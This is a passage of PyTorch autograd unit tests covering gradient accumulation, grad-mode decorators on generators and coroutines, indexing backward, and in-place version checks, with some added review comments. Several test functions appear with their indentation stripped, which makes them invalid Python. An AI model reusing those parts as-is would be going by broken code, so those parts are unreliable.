    x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    x_nonleaf = x * 1
    y = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
    z = torch.randn(2, 2, dtype=torch.double, requires_grad=True)

    out = x_nonleaf ** 2 + y * x_nonleaf + y ** 2

    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[x, y, x_nonleaf])
    x_grad_expected = 2 * x + y
    y_grad_expected = x + 2 * y
    x_non_leaf_expected = 2 * x_nonleaf + y

    self.assertEqual(y.grad, y_grad_expected)
    self.assertEqual(x.grad, x_grad_expected)
    self.assertEqual(x_nonleaf.grad, x_non_leaf_expected)

    # backward doesn't have an allow_unused flag, so the behavior of backward
    # when a variable is not part of the graph is as if allow_unused were true:
    # z.grad will simply be None.
    out.backward(torch.ones(2, 2, dtype=torch.double), create_graph=True, inputs=[z])
    self.assertIsNone(z.grad)
def test_dependent_backward(self):
    # y and z = y**3 live on one graph; backward over both roots must sum
    # their contributions into x.grad.
    x = torch.randn(10, requires_grad=True)
    y = x ** 2
    z = y ** 3

    go_y = torch.randn(10)
    go_z = torch.randn(10)
    torch.autograd.backward([y, z], [go_y, go_z])

    # dy/dx = 2x and dz/dx = 6x**5
    self.assertEqual(x.grad, 2 * x * go_y + 6 * x.pow(5) * go_z)
def test_save_output_nr(self):
    # output_nr records which output of a multi-output Function a tensor
    # is; it must survive a save_for_backward/saved_tensors round-trip.
    x = torch.randn(10, requires_grad=True)

    class MultiOutputFn(Function):
        @staticmethod
        def forward(ctx, x):
            return x[:5], x[5:]

        @staticmethod
        def backward(ctx, *grad):
            return torch.cat(grad)

    a, b = MultiOutputFn.apply(x)
    # b is the second output of MultiOutputFn
    self.assertEqual(b.output_nr, 1)

    class TestFn(Function):
        @staticmethod
        def forward(ctx, b):
            ctx.save_for_backward(b)
            return b * 2

        @staticmethod
        def backward(ctx, grad_b):
            # the saved tensor must still report output_nr == 1
            b, = ctx.saved_tensors
            self.assertEqual(b.output_nr, 1)

    TestFn.apply(b).sum().backward()
def test_free_deep_graph(self):
    # Destroying a very deep chain graph must happen iteratively, not by
    # C-stack recursion, or it would overflow the stack.
    def build_and_drop():
        chain_length = 150000
        leaf = torch.randn(1, requires_grad=True)
        node = leaf.clone()

        # build a "chain" computation graph
        for _ in range(chain_length):
            node = node + node * 0.000001

        # graph deletion occurs when the above locals go out of scope.
        # In this case `del node` will trigger it but it's easier to leave
        # it to Python to delete the locals.

    # Should not stack overflow
    build_and_drop()
def test_free_deep_graph_complicated(self):
    # Freeing a deep graph with (intended) skip connections must not
    # overflow the stack.
    def scope():
        depth = 100000
        randchoice = torch.randint(2, [depth, 2])
        x = torch.randn(1, requires_grad=True)
        y = x.clone()

        # Hold the two previous values
        prev_values = [None, None]

        # Build a "chain with skip connections" graph
        for _ in range(depth):
            # NOTE(review): prev_values[:-1] yields at most one element,
            # so `nprev == 2` below can never hold and the skip-connection
            # branch is dead; if it ever ran, randchoice[depth] would also
            # index out of bounds (valid rows are 0..depth-1). Confirm the
            # intended behavior upstream.
            prev_tensors = [tensor for tensor in prev_values[:-1]
                            if tensor is not None]
            prev_values.append(y)
            prev_values.pop(0)

            # Definitely pick one tensor to add
            y += y * 0.000001

            # Possibly add other tensors
            nprev = len(prev_tensors)
            if nprev == 2:
                y += randchoice[depth].mul(torch.cat(prev_tensors)).sum()

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    scope()
def test_free_deep_graph_pyfunction(self):
    # Deep graphs made of Python-defined Functions must also be freed
    # without recursing down the C stack.
    class MyOp(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            return grad_output, grad_output

    def build_and_drop():
        chain_length = 150000
        leaf = torch.randn(1, requires_grad=True)
        node = leaf.clone()

        # build deeply nested computation graph
        for _ in range(chain_length):
            node = MyOp.apply(node, node)

        # graph deletion occurs when the above locals go out of scope.

    # Should not stack overflow
    build_and_drop()
def test_no_unnecessary_save(self):
    # If we kept x in the derivative Function of x * 2 we would
    # get an error in the backward that would complain that we've
    # modified x, which was needed for gradient computation.
    # Since we should elide unnecessary saves, this test should pass.
    mu = torch.ones(1, requires_grad=True)
    x = torch.empty(1)
    loss = 0
    for i in range(3):
        # reuse the same buffer x across iterations, detaching it from
        # the previous iteration's graph first
        x.detach_()
        x.copy_(mu + i)
        ft = torch.tensor([float(i)])
        multiplied = x * ft
        s = multiplied.sum()
        loss += s
    loss.backward()
def test_no_grad(self):
    # torch.no_grad as both context manager and decorator: results must
    # not require grad, have no grad_fn, and reject backward().
    x = torch.ones(5, 5, requires_grad=True)
    y = torch.ones(5, 5) * 4
    with torch.no_grad():
        w = x + y

    @torch.no_grad()
    def adder(x, y):
        return x + y

    z = adder(x, y)

    self.assertFalse(w.requires_grad)
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
    self.assertIsNone(w.grad_fn)
    self.assertFalse(z.requires_grad)
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
    self.assertIsNone(z.grad_fn)

    # test nested decorator and with-statement on no_grad
    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        w = adder(x, y)
        # leaving the decorated call must restore the outer (disabled) mode
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_generator_functions(self):
    # Grad-mode decorators on generator functions must apply only inside
    # the generator body and not leak into the caller between yields.
    @torch.no_grad()
    def gen_no_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), False)
            yield i

    with torch.enable_grad():
        for _ in gen_no_grad():
            # caller's mode is restored at each yield
            self.assertEqual(torch.is_grad_enabled(), True)

    @torch.enable_grad()
    def gen_enable_grad():
        for i in range(10):
            self.assertEqual(torch.is_grad_enabled(), True)
            yield i

    with torch.no_grad():
        for _ in gen_enable_grad():
            self.assertEqual(torch.is_grad_enabled(), False)
def test_set_grad_generator_functions_recursive(self):
    # enable_grad_decorator_recursive and no_grad_decorator_recursive call each other
    # recursively, to ensure that the decorators preserve the caller's setting
    @torch.enable_grad()
    def enable_grad_decorator_recursive(depth):
        self.assertTrue(torch.is_grad_enabled())
        if depth > 0:
            no_grad_decorator_recursive(depth - 1)
            # mode must be restored after the nested call returns
            self.assertTrue(torch.is_grad_enabled())

    @torch.no_grad()
    def no_grad_decorator_recursive(depth):
        self.assertFalse(torch.is_grad_enabled())
        if depth > 0:
            enable_grad_decorator_recursive(depth - 1)
            self.assertFalse(torch.is_grad_enabled())

    # enable_grad_context_manager_recursive and no_grad_context_manager_recursive call
    # each other recursively, to ensure that the decorators preserve the caller's setting
    def enable_grad_context_manager_recursive(depth):
        with torch.enable_grad():
            self.assertTrue(torch.is_grad_enabled())
            if depth > 0:
                no_grad_context_manager_recursive(depth - 1)
                self.assertTrue(torch.is_grad_enabled())

    def no_grad_context_manager_recursive(depth):
        with torch.no_grad():
            self.assertFalse(torch.is_grad_enabled())
            if depth > 0:
                enable_grad_context_manager_recursive(depth - 1)
                self.assertFalse(torch.is_grad_enabled())

    # exercise both recursions from an enabled and a disabled outer mode
    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertTrue(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertTrue(torch.is_grad_enabled())

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_decorator_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
        enable_grad_context_manager_recursive(10)
        self.assertFalse(torch.is_grad_enabled())
def test_set_grad_coroutines(self):
    # Grad-mode decorators on coroutines: the decorated mode holds inside
    # the coroutine across send(), and the caller's mode is restored at
    # every suspension point.
    @torch.no_grad()
    def coro_no_grad(n=10):
        self.assertFalse(torch.is_grad_enabled())
        for i in range(n):
            self.assertFalse(torch.is_grad_enabled())
            r = yield i
            self.assertFalse(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertFalse(torch.is_grad_enabled())

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        self.assertTrue(torch.is_grad_enabled())
        for i in range(n):
            self.assertTrue(torch.is_grad_enabled())
            r = yield i
            self.assertTrue(torch.is_grad_enabled())
            self.assertEqual(i, r)
        self.assertTrue(torch.is_grad_enabled())

    with torch.enable_grad():
        self.assertTrue(torch.is_grad_enabled())
        coro, r = coro_no_grad(), None
        try:
            while True:
                self.assertTrue(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertTrue(torch.is_grad_enabled())
        except StopIteration:
            pass

    with torch.no_grad():
        self.assertFalse(torch.is_grad_enabled())
        coro, r = coro_enable_grad(), None
        try:
            while True:
                self.assertFalse(torch.is_grad_enabled())
                r = coro.send(r)
                self.assertFalse(torch.is_grad_enabled())
        except StopIteration:
            pass
def test_set_grad_coroutines_benign_exceptions(self):
    # Exceptions thrown *into* a coroutine and handled there must be
    # processed under the coroutine's decorated grad mode.
    class RecoverableException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                # yield negatives once an exception has been absorbed,
                # so the caller can observe recovery
                yield (-i if has_raised else i)

            except RecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                has_raised = True

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)

            except RecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                has_raised = True

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)

        except StopIteration:
            pass

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        try:
            while True:
                r = coro.throw(RecoverableException)
                self.assertLess(r, 0)

        except StopIteration:
            pass
def test_set_grad_coroutines_critical_exceptions(self):
    # An exception thrown into a coroutine that re-raises a different
    # exception must still run its handler under the decorated grad mode.
    class UnrecoverableException(Exception):
        pass

    class SecondaryException(Exception):
        pass

    @torch.no_grad()
    def coro_no_grad(n=10):
        # NOTE: has_raised is never set to True here (the handler raises
        # first); it is kept for symmetry with the benign-exception test.
        has_raised = False
        for i in range(n):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield (-i if has_raised else i)

            except UnrecoverableException:
                self.assertFalse(torch.is_grad_enabled())
                raise SecondaryException

    @torch.enable_grad()
    def coro_enable_grad(n=10):
        has_raised = False
        for i in range(n):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield (-i if has_raised else i)

            except UnrecoverableException:
                self.assertTrue(torch.is_grad_enabled())
                raise SecondaryException

    with torch.enable_grad():
        coro = coro_no_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)

    with torch.no_grad():
        coro = coro_enable_grad()
        assert 0 == next(coro)
        with self.assertRaises(SecondaryException):
            coro.throw(UnrecoverableException)
def test_set_grad_coroutines_exit(self):
    # When a coroutine is close()d, its GeneratorExit handler must still
    # run under the decorated grad mode.
    @torch.no_grad()
    def coro_no_grad(state):
        for i in range(10):
            try:
                self.assertFalse(torch.is_grad_enabled())
                yield i

            except GeneratorExit:
                self.assertFalse(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    @torch.enable_grad()
    def coro_enable_grad(state):
        for i in range(10):
            try:
                self.assertTrue(torch.is_grad_enabled())
                yield i

            except GeneratorExit:
                self.assertTrue(torch.is_grad_enabled())
                state.add('GeneratorExit')
                raise

    state = set()
    with torch.enable_grad():
        coro = coro_no_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)

    state = set()
    with torch.no_grad():
        coro = coro_enable_grad(state)
        for i in range(5):
            next(coro)

        coro.close()
    self.assertTrue('GeneratorExit' in state)
def test_no_grad_python_function(self):
    """Python Functions should respect grad mode."""
    x = torch.ones(5, 5, requires_grad=True)

    class Increment(Function):
        @staticmethod
        def forward(self, x):
            return x + 1

        @staticmethod
        def backward(self, dy):
            return dy

    with torch.no_grad():
        y = Increment.apply(x)
    # applied under no_grad, the output must be detached from the graph
    self.assertFalse(y.requires_grad)
def test_indexing(self):
    # Backward through every supported indexing form: the gradient is 1
    # at the indexed positions and 0 everywhere else.
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    def compare(x, y, idx, indexed_tensor, indexed_var):
        indexed_var_t = indexed_var.data
        if not isinstance(indexed_tensor, torch.Tensor):
            indexed_var_t = indexed_var_t[0]
        self.assertEqual(indexed_tensor, indexed_var_t)

        indexed_var.sum().backward()
        expected_grad = torch.empty(x.size()).fill_(0)
        expected_grad[idx] = 1
        self.assertEqual(y.grad, expected_grad)

    def check_index(x, y, idx):
        # clear leftover grad from a previous check
        if y.grad is not None:
            with torch.no_grad():
                y.grad.zero_()
        indexed_tensor = x[idx]
        indexed_var = y[idx]
        compare(x, y, idx, indexed_tensor, indexed_var)

    check_index(x, y, 1)
    check_index(x, y, (1, 1))
    check_index(x, y, slice(1, None))
    check_index(x, y, slice(None, 2))
    check_index(x, y, (slice(None, 2), 2))
    check_index(x, y, (slice(1, 2), 2))
    check_index(x, y, (1, slice(2, None)))
    check_index(x, y, (slice(None, None), slice(2, None)))
    check_index(x, y, torch.LongTensor([0, 2]))
    check_index(x, y, torch.rand(4, 4).bernoulli().bool())
    check_index(x, y, (Ellipsis, slice(2, None)))
    check_index(x, y, ([0], [0]))
    check_index(x, y, ([1, 2, 3], [0]))
    check_index(x, y, ([1, 2], [2, 1]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([slice(None), [2, 3]]))
    check_index(x, y, ([[2, 3], slice(None)]))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0]))
    check_index(x, y, ([0], ))

    # 3-d tensor: same checks with an extra dimension
    x = torch.arange(1., 49).view(4, 3, 4)
    y = Variable(x, requires_grad=True)

    check_index(x, y, (slice(None), [0], [0]))
    check_index(x, y, ([0], [0], slice(None)))
    check_index(x, y, (slice(None), [0, 1, 2], [0]))

    check_index(x, y, ([0, 1, 2], [0], slice(None)))
    check_index(x, y, (slice(None), [1, 2], [2, 1]))
    check_index(x, y, ([1, 2], [2, 1], slice(None)))
    check_index(x, y, (slice(None), [[1, 2], [2, 0]], [[0, 1], [2, 3]]))
    check_index(x, y, ([[1, 2], [3, 0]], [[0, 1], [2, 2]], slice(None)))
    check_index(x, y, (slice(None), slice(None), [2, 1]))
    check_index(x, y, (slice(None), [2, 1], slice(None)))
    check_index(x, y, ([2, 1], slice(None), slice(None)))

    # advanced indexing, with less dim, or ellipsis
    check_index(x, y, ([0], ))
    check_index(x, y, ([0], slice(None)))
    check_index(x, y, ([0], Ellipsis))
    check_index(x, y, ([1, 2], [0, 1]))
    check_index(x, y, ([1, 2], [0, 1], Ellipsis))
    check_index(x, y, (Ellipsis, [1, 2], [0, 1]))

    # advanced indexing, with a tensor wrapped in a variable
    z = torch.LongTensor([0, 1])
    zv = Variable(z, requires_grad=False)
    seq = [z, Ellipsis]
    seqv = [zv, Ellipsis]

    if y.grad is not None:
        with torch.no_grad():
            y.grad.zero_()
    indexed_tensor = x[seq]
    indexed_var = y[seqv]
    compare(x, y, seq, indexed_tensor, indexed_var)
def test_indexing_duplicates(self):
    # Duplicate indices must *accumulate* gradient, not overwrite it.
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = torch.LongTensor([1, 1, 3, 2, 1, 2])
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx:
        expected_grad[i] += 1
    self.assertEqual(y.grad, expected_grad)

    # with advanced indexing
    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 3, 2, 1, 2], [0]]
    y[idx].sum().backward()
    expected_grad = torch.zeros(4, 4)
    for i in idx[0]:
        for j in idx[1]:
            expected_grad[i][j] += 1

    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 17).view(4, 4)
    y = Variable(x, requires_grad=True)
    idx = [[[1, 2], [0, 0]], [[0, 1], [1, 1]]]
    y[idx].sum().backward()
    # (1,0) is picked twice -> grad 2; the other picked cells get 1
    expected_grad = torch.tensor([[0., 2., 0., 0.],
                                  [1., 0., 0., 0.],
                                  [0., 1., 0., 0.],
                                  [0., 0., 0., 0.]])
    self.assertEqual(y.grad, expected_grad)

    x = torch.arange(1., 65).view(4, 4, 4)
    y = Variable(x, requires_grad=True)

    idx = [[1, 1, 1], slice(None), slice(None)]
    y[idx].sum().backward()
    expected_grad = torch.empty(4, 4, 4).zero_()
    # row 1 selected three times -> every element of that slice gets 3
    expected_grad[1].fill_(3)
    self.assertEqual(y.grad, expected_grad)
def test_index_backward_does_not_save_tensor(self):
    """Regression test: index() must not save its input tensor for backward."""
    # Example from https://github.com/pytorch/pytorch/issues/24853.
    # if `index(tensor, indices)` saves `tensor` for backwards, then it will
    # trigger a version check on `tensor` during the backward pass, which
    # will cause the following code to error because `tensor` gets modified
    # by the indexing line.
    a = torch.tensor([1., 0, 0])
    b = torch.zeros(3, requires_grad=True)
    tensor = b + 0
    tensor[a != 0] = tensor[a != 0]
    # zero grad-output: we only care that backward runs without a version error
    tensor.backward(torch.zeros_like(tensor))
def test_volatile_deprecated(self):
    """Accessing the removed ``volatile`` flag warns and reports False."""
    # Fix: the original reached randn through ``torch.autograd.torch`` -- an
    # accidental submodule attribute left by autograd's own ``import torch``.
    # Call torch.randn directly.
    v = torch.randn(3, 3)
    with warnings.catch_warnings(record=True) as w:
        self.assertFalse(v.volatile)
    # the deprecation warning must mention the removed attribute
    self.assertIn('volatile', str(w[0].message))
def test_saved_variables_deprecated(self):
    """``ctx.saved_variables`` still works but must emit a deprecation warning."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, tensor1, tensor2):
            ctx.save_for_backward(tensor1, tensor2)
            return tensor1 + tensor2

        @staticmethod
        def backward(ctx, grad_output):
            # deprecated alias of ctx.saved_tensors -- should warn
            var1, var2 = ctx.saved_variables
            return (grad_output, grad_output)

    with warnings.catch_warnings(record=True) as warns:
        warnings.simplefilter("always")
        x = torch.randn((3, 3), requires_grad=True)
        y = torch.randn((3, 3), requires_grad=True)
        MyFunction.apply(x, y).sum().backward()

        # Fix: any() replaces the original map()+reduce() pipeline. It is
        # clearer, short-circuits, and is well-defined when no warnings were
        # recorded (reduce() without an initializer raises TypeError on an
        # empty sequence).
        has_deprecated = any('deprecated' in str(warn) and
                             'saved_variables' in str(warn)
                             for warn in warns)
        self.assertTrue(has_deprecated)
def test_requires_grad(self):
    """requires_grad propagates through ops; untracked branches get no backward."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5)
    z = torch.randn(5, 5, requires_grad=True)
    a = x + y
    self.assertFalse(a.requires_grad)
    b = a + z
    self.assertTrue(b.requires_grad)

    def error():
        raise RuntimeError
    # Make sure backward isn't called on these: install hooks that would
    # raise if the engine ever visited the untracked tensors.
    a._backward_hooks = OrderedDict()
    x._backward_hooks = OrderedDict()
    y._backward_hooks = OrderedDict()
    a._backward_hooks['test'] = error
    x._backward_hooks['test'] = error
    y._backward_hooks['test'] = error
    b.backward(torch.ones(5, 5))
def test_requires_grad_(self):
    """requires_grad_() returns self and toggles the flag; it cannot be
    turned off on a non-leaf tensor."""
    x = torch.randn(5, 5)
    y = torch.randn(5, 5, requires_grad=True)
    self.assertIs(x, x.requires_grad_())
    self.assertTrue(x.requires_grad)
    self.assertIs(y, y.requires_grad_())
    self.assertTrue(y.requires_grad)
    self.assertIs(x, x.requires_grad_(True))
    self.assertTrue(x.requires_grad)
    self.assertIs(y, y.requires_grad_(True))
    self.assertTrue(y.requires_grad)
    z = x * y
    # z is not a leaf, so disabling requires_grad on it must fail
    self.assertRaises(RuntimeError, lambda: z.requires_grad_(False))
    self.assertIs(z, z.requires_grad_())
    self.assertTrue(z.requires_grad)
    self.assertIs(z, z.requires_grad_(True))
    self.assertTrue(z.requires_grad)
    self.assertIs(x, x.requires_grad_(False))
    self.assertFalse(x.requires_grad)
    self.assertIs(y, y.requires_grad_(False))
    self.assertFalse(y.requires_grad)
def test_requires_grad_inplace(self):
a = torch.randn(5, 5)
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
# non-leaf
a = torch.randn(5, 5) + 0
b = torch.randn(5, 5, requires_grad=True)
a += b
self.assertTrue(a.requires_grad)
def test_no_requires_grad_inplace(self):
    """In-place ops are fine before requires_grad is enabled, rejected after."""
    # basic case, should be able to modify inplace while requires_grad is False
    a = torch.randn(2, 3)
    a.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))
    # same but with a view
    a = torch.randn(2, 3)
    b = a[:]
    b.add_(5)
    a.requires_grad = True
    a.sum().backward()
    self.assertEqual(a.grad, torch.ones(2, 3))
    # should fail if requires_grad = True when we modify inplace
    a = torch.randn(2, 3)
    b = a[:]
    a.requires_grad = True
    with self.assertRaises(RuntimeError):
        a.add_(5)
    with self.assertRaises(RuntimeError):
        # modifying a view of a grad-requiring leaf is rejected too
        b.add_(5)
def test_attribute_deletion(self):
    """Only .grad may be deleted; the other autograd attributes are protected."""
    x = torch.randn((5, 5), requires_grad=True)
    # deleting .grad resets it to None
    del x.grad
    self.assertIsNone(x.grad)
    with self.assertRaises(RuntimeError):
        del x.data
    with self.assertRaises(TypeError):
        x.data = None
    with self.assertRaises(RuntimeError):
        del x.requires_grad
    with self.assertRaises(RuntimeError):
        del x._grad_fn
    with self.assertRaises(RuntimeError):
        del x._backward_hooks
def test_duplicate_backward_root(self):
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
x = a * b
grad_output = torch.randn_like(x)
torch.autograd.backward([x, x], [grad_output, grad_output])
self.assertEqual(a.grad, b * grad_output * 2)
self.assertEqual(b.grad, a * grad_output * 2)
def test_backward_no_grad(self):
a = torch.randn(5, 5, requires_grad=True)
b = a + 2
with self.assertRaises(RuntimeError):
torch.autograd.backward([b], [None])
def test_backward_twice_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
self.assertRaisesRegex(RuntimeError, 'Specify retain_graph=True',
lambda: c.backward(torch.tensor([1, 1, 1], dtype=torch.double)))
def test_backward_twice_retained_graph_with_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = b + 1
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_twice_retained_graph_without_saved_values(self):
b = torch.randn(3, requires_grad=True, dtype=torch.double)
c = torch.zeros(3, dtype=torch.double)
c[[1, 2]] = b[[1, 1]]
c.backward(torch.tensor([1, 1, 1], dtype=torch.double), retain_graph=True)
c.backward(torch.tensor([1, 1, 1], dtype=torch.double))
def test_backward_create_graph_warns(self):
    """backward(create_graph=True) warns; autograd.grad(create_graph=True) does not."""
    try:
        # force every warning to fire so catch_warnings can record it
        prev = torch.is_warn_always_enabled()
        torch.set_warn_always(True)
        b = torch.randn(3, requires_grad=True, dtype=torch.double)
        c = b * b
        with warnings.catch_warnings(record=True) as ws:
            c.backward(torch.ones_like(c), create_graph=True)
        b.grad = None
        self.assertTrue(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
        # Should not warn for grad
        with warnings.catch_warnings(record=True) as ws:
            torch.autograd.grad(c, b, torch.ones_like(c), create_graph=True)
        self.assertFalse(any('Using backward() with create_graph=True' in str(w.message) for w in ws))
    finally:
        # restore the global warn-always setting even if an assertion failed
        torch.set_warn_always(prev)
def test_next_functions(self):
    """grad_fn.next_functions points at AccumulateGrad nodes for leaves and
    at upstream grad_fns; non-differentiable inputs get a None slot."""
    x = torch.randn(5, 5, requires_grad=True)
    y = torch.randn(5, 5, requires_grad=True)
    a = x + y
    self.assertIsNotNone(a.grad_fn)
    next_functions = a.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIsInstance(next_functions[0][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[0][1], 0)
    self.assertIsInstance(next_functions[1][0], torch._C._functions.AccumulateGrad)
    self.assertEqual(next_functions[1][1], 0)
    b = a + 5
    next_functions = b.grad_fn.next_functions
    self.assertEqual(len(next_functions), 2)
    self.assertIs(next_functions[0][0], a.grad_fn)
    # the scalar constant 5 is not differentiable, hence the None slot
    self.assertIs(next_functions[1][0], None)
def test_inplace(self):
    """In-place ops invalidate backward only for functions that saved the
    modified tensor; version counters enforce this."""
    x = torch.ones(5, 5, requires_grad=True)
    y = Variable(torch.ones(5, 5) * 4, requires_grad=True)
    z = x * y
    q = z + y
    w = z * y
    z.add_(2)
    # Add doesn't need its inputs to do backward, so it shouldn't raise
    q.backward(torch.ones(5, 5), retain_graph=True)
    # Mul saves both inputs in forward, so it should raise
    self.assertRaises(RuntimeError, lambda: w.backward(torch.ones(5, 5)))
    z = x * y
    q = z * y
    r = z + y
    w = z.add_(y)
    # w is the last expression, so this should succeed
    w.backward(torch.ones(5, 5), retain_graph=True)
    # r doesn't use the modified value in backward, so it should succeed
    r.backward(torch.ones(5, 5), retain_graph=True)
    # q uses dirty z, so it should raise
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
    with torch.no_grad():
        x.grad.zero_()
    m = x / 2
    z = m + y / 8
    q = z * y
    r = z + y
    prev_version = z._version
    w = z.exp_()
    # in-place exp_ must bump z's version counter
    self.assertNotEqual(z._version, prev_version)
    r.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.ones(5, 5) / 2)
    w.backward(torch.ones(5, 5), retain_graph=True)
    self.assertEqual(x.grad, torch.empty(5, 5).fill_((1 + math.e) / 2))
    self.assertRaises(RuntimeError, lambda: q.backward(torch.ones(5, 5)))
    leaf = torch.ones(5, 5, requires_grad=True)
    x = leaf.clone()
    x.add_(10)
    self.assertEqual(x, torch.ones(5, 5) * 11)
    # x should be still usable
    y = x + 2
    y.backward(torch.ones(5, 5))
    self.assertEqual(leaf.grad, torch.ones(5, 5))
    z = x * y
    x.add_(2)
    self.assertRaises(RuntimeError, lambda: z.backward(torch.ones(5, 5)))
def test_mark_non_differentiable(self):
class MyFunction(Function):
@staticmethod
def forward(ctx, input):
output = input > 0
ctx.mark_non_differentiable(output)
return output
@staticmethod
def backward(ctx, grad_output):
return (grad_output * 0).to(torch.double)
x = torch.randn(5, 5, requires_grad=True)
mask = MyFunction.apply(x)
self.assertFalse(mask.requires_grad)
y = x.masked_fill(mask, 0)
y.sum().backward()
def test_mark_non_differentiable_mixed(self):
    """Of a mixed output pair, only the differentiable one requires grad and
    the non-differentiable one receives an all-zero incoming gradient."""
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            a = input + 1
            b = input + 2
            ctx.mark_non_differentiable(a)
            return a, b

        @staticmethod
        def backward(ctx, grad_a, grad_b):
            # the marked output's gradient arrives as zeros
            self.assertTrue((grad_a == 0).all())
            self.assertTrue((grad_b == 1).all())
            return grad_b

    x = torch.randn(5, 5, requires_grad=True)
    a, b = MyFunction.apply(x)
    self.assertFalse(a.requires_grad)
    self.assertTrue(b.requires_grad)
    b.sum().backward()
    self.assertEqual(x.grad, torch.ones(5, 5))
def test_mark_non_differentiable_none(self):
    """Returning None for a non-differentiable output must not crash C++ nodes."""
    # This used to segfault because MyFunction would send back null
    # gradients to MulBackward, which is implemented in C++. C++
    # implemented functions expect incoming grad_outputs to be non-null.
    class MyFunction(Function):
        @staticmethod
        def forward(ctx, input):
            output = input.clone()
            ctx.mark_non_differentiable(output)
            return output

        @staticmethod
        def backward(ctx, grad_output):
            return None

    x = torch.randn(5, 5, requires_grad=True)
    r = MyFunction.apply(x * x)
    (r * x).sum().backward()
def test_return_duplicate(self):
class DoubleDuplicate(Function):
@staticmethod
def forward(ctx, x):
output = x * 2
return output, output
@staticmethod
def backward(ctx, grad1, grad2):
return grad1 * 2 + grad2 * 2
def fn(x):
a, b = DoubleDuplicate.apply(x)
self.assertIs(a, b)
return a + b
x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(fn, [x])
gradgradcheck(fn, [x])
def test_return_duplicate_inplace(self):
    """A Function that marks its input dirty and returns it twice."""
    class DoubleInplace(Function):
        @staticmethod
        def forward(ctx, x):
            x.mul_(2)
            ctx.mark_dirty(x)
            return x, x

        @staticmethod
        def backward(ctx, grad1, grad2):
            return grad1 * 2 + grad2 * 2

    def inplace_fn(x):
        a, b = DoubleInplace.apply(x.clone())
        # duplicated outputs collapse to one tensor
        self.assertIs(a, b)
        return a + b

    x = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
    gradcheck(inplace_fn, [x])
    gradgradcheck(inplace_fn, [x])
    # Can't modify leaf variables in-place
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x))
    # Functions which modify views in-place must return only one output
    self.assertRaises(RuntimeError, lambda: InplaceFunction.apply(x.clone()[0]))
@suppress_warnings
def test_resize(self):
x = torch.ones(2, 3)
self.assertTrue(x.resize(3, 2).size() == (3, 2))
def _test_setitem(self, size, index):
x = torch.ones(*size, requires_grad=True)
y = x + 2
